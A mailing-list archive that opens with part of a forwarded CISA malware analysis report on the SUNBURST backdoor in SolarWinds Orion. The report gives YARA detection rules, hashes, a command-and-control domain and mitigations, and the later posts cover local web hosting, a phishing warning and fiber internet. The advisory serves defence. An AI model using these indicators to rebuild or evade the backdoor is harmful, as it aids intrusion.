"001OBAA=" wide ??? ???$d = "0y0oysxNLKqMT04EAA==" wide ??? ???$e = "0y3JzE0tLknMLQAA" wide ??? ???$f = "003PyU9KzAEA" wide ??? ???$h = "0y1OTS4tSk1OBAA=" wide ??? ???$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide ??? ???$j = "c8rPSQEA" wide ??? ???$k = "c8rPSfEsSczJTAYA" wide ??? ???$l = "c60oKUp0ys9JAQA=" wide ??? ???$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide ??? ???$n = "8yxJzMlMBgA=" wide ??? ???$o = "88lMzygBAA==" wide ??? ???$p = "88lMzyjxLEnMyUwGAA==" wide ??? ???$q = "C0pNL81JLAIA" wide ??? ???$r = "C07NzXTKz0kBAA==" wide ??? ???$s = "C07NzXTKz0nxLEnMyUwGAA==" wide ??? ???$t = "yy9IzStOzCsGAA==" wide ??? ???$u = "y8svyQcA" wide ??? ???$v = "SytKTU3LzysBAA==" wide ??? ???$w = "C84vLUpOdc5PSQ0oygcA" wide ??? ???$x = "C84vLUpODU4tykwLKMoHAA==" wide ??? ???$y = "C84vLUpO9UjMC07MKwYA" wide ??? ???$z = "C84vLUpO9UjMC04tykwDAA==" wide ???condition: ??? ???($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an)) } ssdeep Matches 94 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 PE Metadata Compile Date 2020-05-11 17:32:40-04:00 Import Hash dae02f32a21e03ce65412f6e56942daa Company Name SolarWinds Worldwide, LLC. File Description SolarWinds.Orion.Core.BusinessLayer Internal Name SolarWinds.Orion.Core.BusinessLayer.dll Legal Copyright Copyright ? 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved. Original Filename SolarWinds.Orion.Core.BusinessLayer.dll Product Name SolarWinds.Orion.Core.BusinessLayer Product Version 2020.2.5300.12432 PE Sections MD5 Name Raw Size Entropy 87b3389568887539d8c12033e01bcbda header 512 2.901277 58ca620058a1e26cda220dcb83f4eb26 .text 1018368 5.567638 1d816f4a16b05559313aa30a0d3532d6 .rsrc 1536 3.008439 0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910 Description This file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. This embedded SUNBURST code contains the same functions as "SolarWinds.Orion.Core.BusinessLayer.dll" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital certificate. 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 Tags backdoortrojan Details Name SolarWinds.Orion.Core.BusinessLayer.dll Size 1028072 bytes Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows MD5 2c4a910a1299cdae2a4e55988a2f102e SHA1 2f1a5a7411d015d01aaee4535835400191645023 SHA256 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 SHA512 5cbfefe612a40c8872a0faf3db8d3835dc514fb3df159610095b47c595c6caa1ada79cce2b10fb99e648990c3f54f63344d1fa7025090bfcd4e2c55d7210a28d ssdeep 12288:dJKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+cYvjenWHuhh9c0g8vkzE19Wv:rEfDbO97P8TrKhYbenWH4c0g8vkzE19e Entropy 5.579997 Antivirus Ahnlab Backdoor/Win32.SunBurst Antiy Trojan[Backdoor]/MSIL.Agent Avira TR/Sunburst.AH BitDefender Trojan.Sunburst.A Clamav Win.Countermeasure.Sunburst-9809152-0 Comodo Backdoor Cyren W32/Trojan.QTKK-7476 ESET a variant of MSIL/SunBurst.A trojan Emsisoft Trojan.Win32.Sunburst (A) Ikarus Backdoor.Sunburst K7 Trojan ( 00574a531 ) Lavasoft Trojan.Sunburst.A McAfee Trojan-sunburst Microsoft Security Essentials Trojan:MSIL/Solorigate.BR!dha NANOAV Trojan.Win32.SunBurst.iduxfm NetGate Trojan.Win32.Malware Sophos Mal/Sunburst-A Symantec Backdoor.Sunburst Systweak trojan-backdoor.sunburst-r TrendMicro Backdoo.6F8C6A1E TrendMicro House Call Backdoo.6F8C6A1E VirusBlokAda TScope.Trojan.MSIL Zillya! Trojan.SunBurst.Win32.1 YARA Rules * rule CISA_10318927_01 : trojan rat SOLAR_FIRE { ???meta: ??? ???Author = "CISA Code & Media Analysis" ??? ???Incident = "10318927" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_2145" ??? ???Actor = "n/a" ??? ???Category = "TROJAN RAT" ??? ???Family = "SOLAR_FIRE" ??? ???Description = "This signature is based off of unique strings embedded within the modified Solar Winds app" ??? ???MD5_1 = "b91ce2fa41029f6955bff20079468448" ??? ???SHA256_1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77" ??? ???MD5_2 = "846e27a652a5e1bfbd0ddd38a16dc865" ??? ???SHA256_2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6" ???strings: ??? ???$s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 } ??? ???$s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 } ??? ???$s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D } ??? ???$s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 } ???condition: all of them } * rule FireEye_20_00025668_01 : SUNBURST APT backdoor { ???meta: ??? ???Author = "FireEye" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_1917" ??? ???Actor = "n/a" ??? ???Category = "Backdoor" ??? ???Family = "SUNBURST" ??? ???Description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services." ??? ???MD5_1 = "" ??? ???SHA256_1 = "" ???strings: ??? ???$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide ??? ???$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D } ??? ???$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide ??? ???$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C } ??? ???$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide ??? ???$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C } ??? ???$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide ??? ???$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 } ??? ???$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B } ???condition: ??? ???$fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) ) } * rule FireEye_20_00025668_02 : SUNBURST APT backdoor { ???meta: ??? ???Author = "FireEye" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_1917" ??? ???Actor = "n/a" ??? ???Category = "Backdoor" ??? ???Family = "SUNBURST" ??? ???Description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services." ??? ???MD5_1 = "" ??? ???SHA256_1 = "" ???strings: ??? ???$a = "0y3Kzy8BAA==" wide ??? ???$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide ??? ???$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide ??? ???$ac = "C88sSs1JLS4GAA==" wide ??? ???$ad = "C/UEAA==" wide ??? ???$ae = "C89MSU8tKQYA" wide ??? ???$af = "8wvwBQA=" wide ??? ???$ag = "cyzIz8nJBwA=" wide ??? ???$ah = "c87JL03xzc/LLMkvysxLBwA=" wide ??? ???$ai = "88tPSS0GAA==" wide ??? ???$aj = "C8vPKc1NLQYA" wide ??? ???$ak = "88wrSS1KS0xOLQYA" wide ??? ???$al = "c87PLcjPS80rKQYA" wide ??? ???$am = "Ky7PLNAvLUjRBwA=" wide ??? ???$an = "06vIzQEA" wide ??? ???$b = "0y3NyyxLLSpOzIlPTgQA" wide ??? ???$c = "001OBAA=" wide ??? ???$d = "0y0oysxNLKqMT04EAA==" wide ??? ???$e = "0y3JzE0tLknMLQAA" wide ??? ???$f = "003PyU9KzAEA" wide ??? ???$h = "0y1OTS4tSk1OBAA=" wide ??? ???$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide ??? ???$j = "c8rPSQEA" wide ??? ???$k = "c8rPSfEsSczJTAYA" wide ??? ???$l = "c60oKUp0ys9JAQA=" wide ??? ???$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide ??? ???$n = "8yxJzMlMBgA=" wide ??? ???$o = "88lMzygBAA==" wide ??? ???$p = "88lMzyjxLEnMyUwGAA==" wide ??? ???$q = "C0pNL81JLAIA" wide ??? ???$r = "C07NzXTKz0kBAA==" wide ??? ???$s = "C07NzXTKz0nxLEnMyUwGAA==" wide ??? ???$t = "yy9IzStOzCsGAA==" wide ??? ???$u = "y8svyQcA" wide ??? ???$v = "SytKTU3LzysBAA==" wide ??? ???$w = "C84vLUpOdc5PSQ0oygcA" wide ??? ???$x = "C84vLUpODU4tykwLKMoHAA==" wide ??? ???$y = "C84vLUpO9UjMC07MKwYA" wide ??? ???$z = "C84vLUpO9UjMC04tykwDAA==" wide ???condition: ??? ???($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an)) } ssdeep Matches 94 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 PE Metadata Compile Date 2020-04-21 10:53:33-04:00 Import Hash dae02f32a21e03ce65412f6e56942daa Company Name SolarWinds Worldwide, LLC. File Description SolarWinds.Orion.Core.BusinessLayer Internal Name SolarWinds.Orion.Core.BusinessLayer.dll Legal Copyright Copyright ? 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved. Original Filename SolarWinds.Orion.Core.BusinessLayer.dll Product Name SolarWinds.Orion.Core.BusinessLayer Product Version 2020.2.5200.12394 PE Sections MD5 Name Raw Size Entropy 7810cd48d16fb0d3c3a0c855f2d9225a header 512 2.907043 f249efb5d984eb62f325179a721985f3 .text 1018368 5.567580 9aea23ae0750b77218d9a85d4896eb0c .rsrc 1536 3.005835 0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910 Description This file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. This embedded SUNBURST code contains the same functions as "SolarWinds.Orion.Core.BusinessLayer.dll" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital certificate. Relationship Summary 32519b85c0... Connected_To avsvmcloud.com 32519b85c0... Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 avsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 d0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 Conclusion Please refer to the following resources for additional information and mitigation actions related to this campaign: 1) Alert (AA20-352A): Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations https://us-cert.cisa.gov/ncas/alerts/aa20-352a 2) Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise https://cyber.dhs.gov/ed/21-01/ Recommendations CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts. * Maintain up-to-date antivirus signatures and engines. * Keep operating system patches up-to-date. * Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication. * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required. * Enforce a strong password policy and implement regular password changes. * Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known. * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests. * Disable unnecessary services on agency workstations and servers. * Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header). * Monitor users' web browsing habits; restrict access to sites with unfavorable content. * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.). * Scan all software downloaded from the Internet prior to executing. * Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs). Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, *"Guide to Malware Incident Prevention & Handling for Desktops and Laptops".* Contact Information * 1-888-282-0870 * CISA Service Desk (UNCLASS) * CISA SIPR (SIPRNET) * CISA IC (JWICS) CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.surveymonkey.com/r/G8STDRY Document FAQ *What is a MIFR?* A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. *What is a MAR?* A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. *Can I edit this document?* This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk . *Can I submit malware to CISA?* Malware samples can be submitted via three methods: * Web: https://malware.us-cert.gov * E-Mail: submit at malware.us-cert.gov * FTP: ftp.malware.us-cert.gov (anonymous) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov . Revisions * February 8, 2021: Initial Version ------------------------------------------------------------------------ This product is provided subject to this Notification and this Privacy & Use policy. Having trouble viewing this message? View it as a webpage . You are subscribed to updates from the Cybersecurity and Infrastructure Security Agency (CISA) Manage Subscriptions | Privacy Policy ??| Help Connect with CISA: Facebook ? | Twitter ? | Instagram ? | LinkedIn ? | YouTube ------------------------------------------------------------------------ This email was sent to michaelk at tnrglobal.com using GovDelivery Communications Cloud, on behalf of: Cybersecurity and Infrastructure Security Agency ? 707 17th St, Suite 4000 ? Denver, CO 80202 GovDelivery logo -------------- next part -------------- An HTML attachment was scrubbed... URL: From sam at itabix.com Mon Feb 8 16:25:49 2021 From: sam at itabix.com (Sam McClellan) Date: Mon, 8 Feb 2021 11:25:49 -0500 Subject: [Hidden-tech] who is local who does website ux/ui/branding ? In-Reply-To: References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com> <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com> Message-ID: <84a90e71-873c-ef5f-d7d1-10339e2cd3ea@itabix.com> Hi Rob, Thanks for asking! I've been doing web development since 1998, and started Itabix in 2000 because I was frustrated with the division between development and hosting where, for example, if your site got hacked, the hosting company would threaten to shut you off in a day or two (or would actually just suspend you) and often the web designer wasn't available or didn't have enough tech savvy to fix it. If a site we're hosting breaks we fix it inexpensively, or free if you're on our managed hosting. And we do things like track the domain names we host to make sure they don't expire or get hijacked. Itabix is a distributed company. Right now I'm the only one in our office in Hadley, everyone else is remote. We have 24/7 first tier support. We've gradually grown to be a one stop shop for pretty much everything needed for a web presence for small to medium businesses. So far we've never advertised, and depend on word of mouth entirely which is one reason our prices are so low. > Website security * We have a great server management team in the UK, and I also have the servers security audited every few months by another firm. * Our servers all have colo level DDOS protection and are hosted in major multihomed telcos. * We use CloudLinux which is great at managing resources so one site doesn't take over the server * We use LiteSpeed for the web server which is fantastic, lowers the server load by about 300% in my experience along with speeding it up, and their free caching plugin for WordPress works with the webserver (the webserver actually does the caching, the plugin just manages it) and is as good as WP Rocket without the $49/year. * We use ImmunifyAV+ which imo is the best antivirus/antimalware system for Linux webservers and changed my life. It just takes care of everything, we have had very few malware attacks that needed manual attention since we started using it several years ago. * We back up sites daily using JetBackup which is much better than the default cPanel backup - much lower server load and great to use. Backups are kept for at least three months. * Hosting servers are optimized for WordPress. * We have 24/7 first tier support. * For high load websites, especially those with a history of being hacked, we usually recommend Sucuri which does CDN at least as well as Cloudflare and have a much better firewall along with actually fixing issues if they come up, for a lot less. * For websites we manage, we typically use the All In One WP Security plugin along with keeping the site up to date and watching out for possibly insecure themes and plugins, making sure all directories aren't readable, and we can also do various things like disabling file editing inside WordPress, securing wp-includes, etc. > technical SEO within general SEO, Local SEO, PPC search vs. display, > ROI planning I would say this is our weakest area. We aren't going to be nearly as good as a specialized firm such as yours, but for a lot of our clients getting most of their top 10 keywords onto the first page of Google is typically about all they want and can afford, and my SEO guy has done a great job with that. That being said, I'd invite you to talk more about your team -- I'd love to have someone to refer any higher need clients to. > website design I've been doing web development and design for 23 years, and I do most of the design work but I do have a designer on our team that is very good, although a bit mainstream for my taste, and we also happily work for/with/partner with outside designers. I'm very focused on UX. I've studied psychology and done a lot of research on how people respond to website UI and the unconscious drivers that can make a website feel pleasant and engaging or frustrating and tiring. Along with the normal readability (consistent style, appropriate contrast, readable font face and size, balanced whitespace, word and line spacing, etc.) and navigation issues are things like presenting to the three major learning styles, designing for the visual cortex, using visual anchors so people don't have to keep re-finding their place, presenting easily grasped paths for different subjects or learning styles, avoiding "buckets" where you have to use the browser back arrow to get to the next thing, etc. > website coding I've hired individual programmers around the world (US, Russia, Ukraine, Serbia, Brazil, India, Bangladesh) for most of our history, but in 2014 I found a truly great programming team in India with an extremely savvy manager who is also a very good, very honorable person. I've yet to find anything they can't do well with websites, plugins, mobile apps and, lately, video conferencing. We have three dedicated full time programmers right now and can call in others as needed. We specialize in WordPress and PHP but we've got people who can work in pretty much any popular language or platform. I hope this answers your questions. Best, Sam *Sam McClellan* ** *Itabix, Inc* ** *one place for all things **web*** ** *sam at itabix.com* ** *https://itabix.com* ** *Main - 413.587.4600* ** *Toll-free - 877-7ITABIX (877.748.2249) * On 2/8/2021 8:52 AM, Rob Laporte wrote: > Hi Sam, > > Wow, Itabix does a lot. Years ago my search marketing firm began > extricating ourselves from any web dev, to focus on our core expertise > in search marketing and conversion rate optimization, and to avoid the > burgeoning complexity, risks, and potential /legal liabilities/ in web > dev and hosting. We often refer clients and prospects to firms we > like. I have a few questions I share with the HT list here, so all may > know. I suggest putting such answers on your About Us page. > > Who is on your team, and what are their specialties and backgrounds? > I?ve found that these days, and increasingly, adequacy, to say nothing > of excellence, requires ever more specialization. Website security, > technical SEO within general SEO, Local SEO, PPC search vs. display, > ROI planning, website design, website coding (even in WP), and more, > increasingly demand one dedicated pro for each. > > If your team can pull off adequacy in all the services on your > website--and for the incredible prices you cite--your team and > management systems must be first-rate, and worth Western Mass knowing > about. > > Take Care, > > > Rob Laporte > > Chief Business Development Officer | Founder | Chairman > > DISC - Making Websites Make Money > > 413-584-6500 > > rob at 2disc.com ?| LinkedIn > | 2DISC.com > > > *NOTE:*?Emails can be blocked by spam filters throughout the web. If > you don?t get a reply within an expected span of time, please call. > > ------------------------------------------------------------------------ > *From:* Hidden-discuss > on behalf of Sam McClellan via Hidden-discuss > > *Sent:* Tuesday, February 2, 2021 1:27 PM > *To:* hidden-discuss at lists.hidden-tech.net > > *Subject:* Re: [Hidden-tech] who is local who does website > ux/ui/branding ? > Hi Rich, > > Sorry I haven't answered until now, lots going on. It's a bit > difficult question to answer accurately just based on your > description. It seems like they would be simple sites - I'd venture a > range between $700 and $1500 depending on how much we'd need to > customize the WordPress theme and how we'd connect and display the > data sources. And if you wanted multiple sites that use features from > the first site, that would lower the cost for the additional sites. > > I can give you some examples of sites we've done along with their cost. > > https://connectingpoint.nepm.org/ > We just finished doing a complete redesign for New England Public > Media's Western Mass television news show. The site was originally an > archival site, they wanted to switch it to be more interactive and > live and they wanted something very clean and light to highlight the > images and video feeds. We switched to a different theme (Divi is our > go-to these days). We needed to script the blog pages and the slider > to allow for using either an image or a video from either YouTube or > their proprietary system. > The site includes a timer function, at midnight on Friday it shows a > countdown to 6pm along with information information and images about > the episode along with buttons for adding you to their mailing list > and another to be put on a reminder list for upcoming shows. When the > countdown ends at 6pm it refreshes the page and shows the live feed > and hides the episode information, then at 6:30 it switches back to > the normal site. $2,500. > > https://presencia.nepm.org/ > Also for New England Public Media, we developed this bilingual website > for their show. Similar issue with displaying the blog post videos or > images. $1730. > > https://www.aomtheatre.com/ > Converted the existing WordPress site and set up a custom ticket > selection system. $1400. > > https://mitsuwa.com/ > We develop this site for a Chicago advertising agency that has > Mitsuwa, a national Japanese grocery store chain, as their client. The > ad agency gives us the design and we implement it. We converted their > site to Divi, as well. > We developed a complex system for them where they can import a batch > of products in an Excel spreadsheet (and upload images) to display > their products for each of the stores, for a video feed in their > stores, for upcoming sales and for vendors and management to preview > upcoming sales before they go live. In addition, they can set up > banner images and events with images and text. All of these (product > batches, individual banners, and individual events) are set to display > in any particular store according to an assigned date range. > They keep adding functions so I'll just say the conversion to Divi and > basic functions I described were approx. $10,000. We're also currently > working on a shopping cart system that organizes pickups and > deliveries for $5760. > > https://www.kimata.com/ > Another site we developed for the Chicago advertising agency which > supplied the design. A personnel site in English and Japanese > displaying available jobs in the US and a separate site for Mexico. We > created a backend system for managing both applicants and companies. > $7500. > > https://inner-act.com/ > Converted an existing site to WordPress and re-developed it and > created the animations, they supplied the logo. $1700. > > Simpler sites we developed and created the logo for: > https://oilco-op.com/ - also developed the > slideshow, and developed a custom member signup and management system > with three different tiers and different pricing depending on the > month you sign up. $1900. > https://wellspringneuro.com/ $650. > https://adimech.com/ $650. > https://optimalbrain.com/ $650. > > best, > Sam > > > > *Sam McClellan* > > *Itabix, Inc* > > *one place for all things **web*** > > *sam at itabix.com * > > *https://itabix.com * > > *Main - 413.587.4600* > > *Toll-free - 877-7ITABIX (877.748.2249) * > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: hibejajednicbmdd.png Type: image/png Size: 15646 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: dhhlebgbpmjlkjnl.png Type: image/png Size: 15646 bytes Desc: not available URL: From rich at tnrglobal.com Wed Feb 10 18:55:38 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Wed, 10 Feb 2021 13:55:38 -0500 Subject: [Hidden-tech] Heads up - phishing on the raise Message-ID: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> Just warning that (as webmaster) I've gotten a could be reports of phishing coming to list members with that looks like HT listings. Specific with the subject seen as been: Re: [Hidden-tech] * * * Archiving contact list from Android phone * * * And it has a xls attachment that asked for extended access that would open your machine to attack. As with any alerts, watch for attachments, with HT does not allow. As with any emails, there is no validation as to who the email is coming from - you have to look at the internal headers esp FROM to see if this is a proper list entry - it will have ???????????????????? Received: from dmoz.awboc.com (mm02.tnrnet.com [3.17.96.37]) just to be clear, the archives are public without raw emails - email are in the archives encoded into text. -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com From jm-hiddentech at vj8.net Wed Feb 10 19:11:16 2021 From: jm-hiddentech at vj8.net (James Triplett) Date: Wed, 10 Feb 2021 14:11:16 -0500 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> Message-ID: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now. Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming- perhaps 20 or 30 mbps upload? Typical cable modem Internet, as most know, is highly assymmetric: my connection here in Amherst is around 60mbps down and 6mbps up. thanks, James From matthew at crocker.com Wed Feb 10 20:28:32 2021 From: matthew at crocker.com (Matthew Crocker) Date: Wed, 10 Feb 2021 20:28:32 +0000 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> Message-ID: <010001778da19246-409d1ca6-49a4-40c6-bb95-95b3a235b66f-000000@email.amazonses.com> James, What is the address you are looking for? MBI can do lateral builds, not sure if 20-30 mbps is big enough to justify the cost though. Have you looked at GCET? -Matt ?On 2/10/21, 3:26 PM, "Hidden-discuss on behalf of James Triplett via Hidden-discuss" wrote: I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now. Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming- perhaps 20 or 30 mbps upload? Typical cable modem Internet, as most know, is highly assymmetric: my connection here in Amherst is around 60mbps down and 6mbps up. thanks, James _______________________________________________ Hidden-discuss mailing list - home page: http://www.hidden-tech.net Hidden-discuss at lists.hidden-tech.net You are receiving this because you are on the Hidden-Tech Discussion list. If you would like to change your list preferences, Go to the Members page on the Hidden Tech Web site. http://www.hidden-tech.net/members From phake at hitpointstudios.com Wed Feb 10 20:40:29 2021 From: phake at hitpointstudios.com (Paul Hake) Date: Wed, 10 Feb 2021 15:40:29 -0500 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> Message-ID: Hi James, We've been happy with our GCET commercial fiber line at our coworking space in Greenfield. Right now I'm at 387mb down and 402mb up when plugged in and it usually hovers around there. We also just got residential fiber where I live in Leyden and it's about that same speed or faster, which is amazing considering we had only DSL as an option in mid-2020. I know a lot of the towns around Greenfield are also setting up their own fiber networks as well. We're fortunate to have the options! Good luck. Best, Paul [image: Screen Shot 2021-02-10 at 3.34.40 PM.png] On Wed, Feb 10, 2021 at 3:26 PM James Triplett via Hidden-discuss < hidden-discuss at lists.hidden-tech.net> wrote: > I surfed around on the Mass Broadband Initiative site, and there's lots of > ambitious plans, but I wonder what's actually available now. > Is it possible to get a solid symmetric Internet connection in > Greenfield? I'm hoping to find one good enough for realtime streaming- > perhaps 20 or 30 mbps upload? > > Typical cable modem Internet, as most know, is highly assymmetric: my > connection here in Amherst is around 60mbps down and 6mbps up. > > thanks, > James > _______________________________________________ > Hidden-discuss mailing list - home page: http://www.hidden-tech.net > Hidden-discuss at lists.hidden-tech.net > > You are receiving this because you are on the Hidden-Tech Discussion list. > If you would like to change your list preferences, Go to the Members > page on the Hidden Tech Web site. > http://www.hidden-tech.net/members > -- Paul B. Hake - CEO HitPoint Inc. -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: Screen Shot 2021-02-10 at 3.34.40 PM.png Type: image/png Size: 39451 bytes Desc: not available URL: From paul at bissex.net Wed Feb 10 21:44:35 2021 From: paul at bissex.net (Paul Bissex) Date: Wed, 10 Feb 2021 16:44:35 -0500 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> Message-ID: If you're in Greenfield, I recommend GCET for sure. Half the price of Comcast (for residential anyway), reliable, and 30Mbps+ symmetric. Speed test I just ran shows about 34 down, 38 up, which is not atypical. ? https://i.speedof.me/210210213856-50 P On 2/10/21 2:11 PM, James Triplett via Hidden-discuss wrote: > I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now. > Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming- perhaps 20 or 30 mbps upload? > > Typical cable modem Internet, as most know, is highly assymmetric: my connection 